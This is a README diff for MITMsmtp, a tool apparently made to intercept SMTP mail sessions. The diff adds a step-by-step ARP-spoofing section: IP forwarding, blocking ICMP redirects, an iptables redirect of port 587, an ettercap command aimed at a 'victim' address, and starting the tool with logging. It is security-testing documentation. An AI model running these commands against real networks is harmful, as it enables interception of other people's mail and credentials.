RobinMeis/MITMsmtp/README.md

 To use MITMsmtp with the example certificates run `MITMsmtp --certfile certs/MITMsmtp.crt --keyfile certs/MITMsmtp.key`.

-To use mitm-smtp as a transparent SMTP Proxy, enable forwarding mode...
+## MITM
+This section shows the usage of MITMsmtp if you are able to intercept the victims traffic.

+### ARP Spoofing
+ARP Spoofing is one way to get between Victim and Router.
+In case you have the ability to modify your routers settings, you might skip this step.
+First off all you need the victims and the routers IP address.
+Make also sure that your client is connected to the same subnet.

+In this example the Routers IP will be *192.168.42.1* and the Victims IP will be *192.168.42.24*.
+Run the following commands as root.

+First of all we are going to enable forwarding mode:

-``sysctl -w net.ipv4.ip_forward=1``
+`sysctl -w net.ipv4.ip_forward=1`

-...block ICMP redirects...
+To make sure that out victim doesn't find a way around us, block ICMP redirects:

-``sysctl -w net.ipv4.conf.all.send_redirects=0``
+`sysctl -w net.ipv4.conf.all.send_redirects=0`

-...and create a port forwarding.
+Next we create a port forwarding rule from SMTP default port 587 to MITMsmtp.
+Please make sure that your victim uses port 587 and adjust if needed.
-``iptables -t nat -A PREROUTING -p tcp --destination-port 587 -j REDIRECT --to-port 8888``
+`iptables -t nat -A PREROUTING -p tcp --destination-port 587 -j REDIRECT --to-port 8587`

+To start ARP Spoofing you will need ettercap.
+Run the following command and replace the IP addresses according to your setup:

+`ettercap -T -M arp /192.168.42.24/ /192.168.42.1/`

+Finally you can fire up MITMsmtp:

+`MITMsmtp --log log/`

 ## Reference
 [1] https://tools.ietf.org/html/rfc5321